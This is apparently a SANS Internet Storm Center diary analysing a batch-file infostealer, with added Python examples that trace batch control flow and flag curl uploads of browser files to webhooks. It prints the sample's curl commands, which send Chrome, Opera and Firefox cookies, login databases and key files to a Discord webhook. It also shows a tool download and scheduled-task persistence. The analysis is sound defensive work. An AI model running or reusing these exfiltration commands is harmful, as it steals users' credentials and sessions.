SANS Internet Storm Center (SANS ISC) diary
Infostealer in a Batch File

It’s pretty common to see malicious content delivered as email attachments. Every day, my mailboxes are flooded with malicious content... which is great from a research point of view. Am I the only one to be happy when I see my catch-all mailboxes full of junk?

A few days ago, one of our readers (thanks Ron!) shared a nice piece of malicious code. This one was interesting to share with our community because it was a simple batch file (.bat). Yes, even batch files can be malicious! From an attacker’s perspective, it’s an interesting approach because it is, basically, a text file. Even more, the sample started with a very low VirusTotal score: 2/56, and today it reached 12/56! (sha256: a21f2e8e5861dbc232e4c6934edbf9fa355575d1e5839f7596a297b5737473c8)[1]

The file targets Windows 10 operating systems because it relies on curl.exe to install extra tools to collect interesting data and exfiltrate them. Curl has been included in Windows 10 since build 1763[2]. Curl is a powerful tool with many features that are often not known[3].

Let’s have a look at the script. It contains a lot of junk code, but that code seems unused because the script starts with the following lines:

@echo off
cd .
goto temp

This label is located much further down in the code, so everything between the goto and the label is never executed.
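To separate the junk from the code that actually runs, an analyst can follow the batch file's control flow statically instead of reading it top to bottom. The following Python script is an added example written for this diary, not code from the sample or from the ISC; it walks a constructed batch file (placeholder URLs, no real webhook) from the first line, follows each unconditional `goto` to its label, and reports which command lines are reached and which are dead. Only unconditional `goto` at the start of a line is followed; `if ... goto`, `call`, and `goto` inside parenthesised blocks are not modelled.

```python
import re

# Constructed sample batch file (not the diary's sample). It mimics the
# layout described above: the script jumps over junk to a label defined far
# below it. URLs are placeholders.
SAMPLE_BAT = r"""@echo off
cd .
goto temp
echo this junk block is never executed
set "decoy=unused"
:temp
set "webhook=https://example.invalid/api/webhooks/PLACEHOLDER"
curl --silent -L --fail "https://example.invalid/s.exe" -o s.exe
goto done
echo also skipped
:done
exit /b 0
"""

LABEL_RE = re.compile(r'^\s*:([^\s:]+)')          # ":name" defines a label
GOTO_RE = re.compile(r'^\s*goto\s+:?(\S+)', re.I)  # unconditional "goto name"
COMMENT_PREFIXES = ("rem ", "::")


def find_labels(lines):
    """Map each label (case-insensitive) to the index of its first definition."""
    labels = {}
    for index, line in enumerate(lines):
        match = LABEL_RE.match(line)
        if match:
            labels.setdefault(match.group(1).lower(), index)
    return labels


def reachable_lines(script):
    """Return the commands cmd.exe would actually run on the straight-line path.

    Follows unconditional gotos and stops at exit, goto :eof, a missing label
    (cmd.exe aborts the batch in that case) or a jump taken a second time
    (a loop)."""
    lines = script.splitlines()
    labels = find_labels(lines)
    executed = []
    jumps_taken = set()
    index = 0
    while index < len(lines):
        stripped = lines[index].strip()
        if (not stripped or stripped.lower().startswith(COMMENT_PREFIXES)
                or LABEL_RE.match(stripped)):
            index += 1
            continue
        match = GOTO_RE.match(stripped)
        if match:
            target = match.group(1).lower()
            if target == "eof" or index in jumps_taken or target not in labels:
                break
            jumps_taken.add(index)
            index = labels[target] + 1
            continue
        executed.append(stripped)
        if stripped.lower().startswith("exit"):
            break
        index += 1
    return executed


def unreached_lines(script):
    """Command lines that the straight-line path never executes (dead junk)."""
    reached = set(reachable_lines(script))
    return [line.strip() for line in script.splitlines()
            if line.strip() and not LABEL_RE.match(line)
            and not GOTO_RE.match(line)
            and not line.strip().lower().startswith(COMMENT_PREFIXES)
            and line.strip() not in reached]


if __name__ == "__main__":
    print("executed:")
    for command in reachable_lines(SAMPLE_BAT):
        print("  " + command)
    print("never reached:")
    for command in unreached_lines(SAMPLE_BAT):
        print("  " + command)
```

Running it against the constructed sample lists the five commands on the live path (the webhook assignment, the download and the exit) and the three decoy lines that never run. Against a real sample, the reached list is the part worth reading first; the rest can be triaged later for strings and indicators.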

The data exfiltration is performed via a Discord webhook, which is very common these days:

set "webhook=hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm"

As I said, the script makes intensive use of curl.exe. Here are the commands executed.

Basic info about the victim’s computer is exported:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```[Report from REM - 172.16.74.20]\nLocal time: 16:17```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

Then, the script downloads a tool to take a screenshot and exfiltrate the PNG file:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Screenshot @ 16:17```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent -L --fail "hxxps://github[.]com/chuntaro/screenshot-cmd/blob/master/screenshot.exe?raw=true" -o s.exe
curl --silent --output /dev/null -F ss=@"C:\Users\Public\Documents\s.png" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

More info is gathered from the OS (stored in a temp file "sysinfo.txt") and sent to Discord:

curl --silent --output /dev/null -F systeminfo=@"C:\Users\REM\AppData\Roaming\sysinfo.txt" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

Chrome files are collected and exfiltrated:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- CHROME -```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F c=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Cookies" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F h=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\History" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F s=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Shortcuts" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F b=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Bookmarks" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F l=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Default\Login Data" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F l=@"C:\Users\REM\AppData\Local\Google\Chrome\User Data\Local State" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

Same for Opera:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- OPERA -```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F c=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Cookies" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F h=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\History" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F s=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Shortcuts" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F b=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Bookmarks" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F l=@"C:\Users\REM\AppData\Roaming\Opera Software\Opera Stable\Login Data" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

And, finally, Firefox:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```- FIREFOX -```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\logins.json" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\key3.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\key4.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\6ukz553v.default-release\cookies.sqlite" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\logins.json" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\key3.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\key4.db" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
curl --silent --output /dev/null -F level=@"C:\Users\REM\AppData\Roaming\Mozilla\Firefox\Profiles\me64g8nk.default\cookies.sqlite" hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm

At the end, a new .bat file is generated and registered as a scheduled task for persistence, so that data is exfiltrated at regular intervals:

curl --silent --output /dev/null -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": \"```Batch Scheduled: true, Daily\n[End of report]```\"}"  hxxps://discord[.]com/api/webhooks/943511093798658108/i2pu2cf0dl8LNSyuK_24gUyZYhjlPPApTvdJhM0tceJSgMCWJRTXQmArYun0-oRt-TYm
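From a detection standpoint, every one of the commands above has the same shape: curl.exe, a multipart upload (`-F name=@path`) of a browser profile file, and a Discord webhook URL as the destination. The following Python script is an added example (not part of the diary, and not the sample's code) that classifies process-creation command lines on that basis. The command lines it runs on are constructed with placeholder webhook ids and tokens; the Chrome, Opera and Firefox paths follow the ones quoted above, the Vivaldi profile path is an assumption, and the severity tiers are this example's own choice.

```python
import re

# Constructed process-creation command lines (no real host data), modelled on
# the curl invocations quoted in the diary. Webhook ids/tokens are placeholders.
SAMPLE_COMMAND_LINES = [
    r'curl --silent --output /dev/null -X POST -H "Content-Type:application/json" --data "{\"content\": \"report\"}" https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN',
    r'curl --silent --output /dev/null -F c=@"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default\Cookies" https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN',
    r'curl --silent --output /dev/null -F systeminfo=@"C:\Users\alice\AppData\Roaming\sysinfo.txt" https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN',
    r'curl --silent -L --fail "https://example.invalid/screenshot.exe?raw=true" -o s.exe',
    r'curl -sS https://example.invalid/api/status',
    r'curl --silent --output /dev/null -F level=@"C:\Users\alice\AppData\Roaming\Mozilla\Firefox\Profiles\abcd1234.default-release\logins.json" https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER_TOKEN',
]

WEBHOOK_RE = re.compile(r'https?://(?:[\w-]+\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+', re.I)
# "-F name=@path": a multipart file upload; the path may be quoted (spaces).
UPLOAD_RE = re.compile(r'(?:^|\s)-F\s+[^=\s]+=@(?:"([^"]+)"|(\S+))')

# Chromium-family profile directories: Chrome and Opera paths as quoted in the
# diary; the Vivaldi path (Vivaldi\User Data) is assumed.
CHROMIUM_DIR = r'\\(?:Google\\Chrome\\User Data|Opera Software\\Opera Stable|Vivaldi\\User Data)\\(?:[^\\]+\\)?'
SENSITIVE_PATHS = [
    ("chromium_credentials", re.compile(CHROMIUM_DIR + r'(?:Login Data|Local State)$', re.I)),
    ("chromium_browsing_data", re.compile(CHROMIUM_DIR + r'(?:Cookies|History|Shortcuts|Bookmarks)$', re.I)),
    ("firefox_credentials", re.compile(r'\\Mozilla\\Firefox\\Profiles\\[^\\]+\\(?:logins\.json|key[34]\.db)$', re.I)),
    ("firefox_browsing_data", re.compile(r'\\Mozilla\\Firefox\\Profiles\\[^\\]+\\cookies\.sqlite$', re.I)),
]


def is_curl(cmdline):
    """True when the image invoked is curl/curl.exe (possibly with a full path)."""
    tokens = cmdline.strip().split()
    if not tokens:
        return False
    image = tokens[0].strip('"').lower().rsplit("\\", 1)[-1]
    return image in ("curl", "curl.exe")


def analyze_command_line(cmdline):
    """Classify one command line. Severity tiers are this example's own:
    high   = file from a browser credential/profile store posted to a webhook
    medium = any other local file posted to a webhook
    low    = webhook contacted with a message only
    none   = not curl, or no webhook involved"""
    finding = {"webhook": False, "uploads": [], "sensitive": [], "severity": "none"}
    if not is_curl(cmdline):
        return finding
    finding["webhook"] = WEBHOOK_RE.search(cmdline) is not None
    for match in UPLOAD_RE.finditer(cmdline):
        path = match.group(1) or match.group(2)
        finding["uploads"].append(path)
        for name, pattern in SENSITIVE_PATHS:
            if pattern.search(path):
                finding["sensitive"].append(name)
    if finding["webhook"] and finding["sensitive"]:
        finding["severity"] = "high"
    elif finding["webhook"] and finding["uploads"]:
        finding["severity"] = "medium"
    elif finding["webhook"]:
        finding["severity"] = "low"
    return finding


def triage(command_lines):
    """Run the classifier over a batch of command lines."""
    return [analyze_command_line(c) for c in command_lines]


if __name__ == "__main__":
    for cmdline, finding in zip(SAMPLE_COMMAND_LINES, triage(SAMPLE_COMMAND_LINES)):
        print(finding["severity"].upper().ljust(6), finding["sensitive"], cmdline[:70])
```

On the constructed input, the message-only beacon scores low, the sysinfo.txt upload medium, the Chrome cookies and Firefox logins.json uploads high, and the two curl invocations without a webhook are ignored. In production the command line would come from Sysmon Event ID 1 or Windows Security event 4688 (with command-line auditing enabled); the download of an executable to a user-writable path, as in the screenshot tool step, is a separate signal worth correlating with the upload.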

These are the applications that were detected in my lab, but when I checked the code, I found support for the following tools as well:

  • Vivaldi
  • osu!
  • Discord
  • Steam
  • Minecraft
  • Growtopia

Between the multiple invocations of curl.exe, the script verifies the presence of these tools and prepares the information to exfiltrate. A good example that demonstrates that even a simple batch script can be dangerous!

[1] https://www.virustotal.com/gui/file/a21f2e8e5861dbc232e4c6934edbf9fa355575d1e5839f7596a297b5737473c8
[2] https://techcommunity.microsoft.com/t5/containers/tar-and-curl-come-to-windows/ba-p/382409
[3] https://isc.sans.edu/forums/diary/Exploiting+the+Power+of+Curl/23934

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
Mar 9th 2022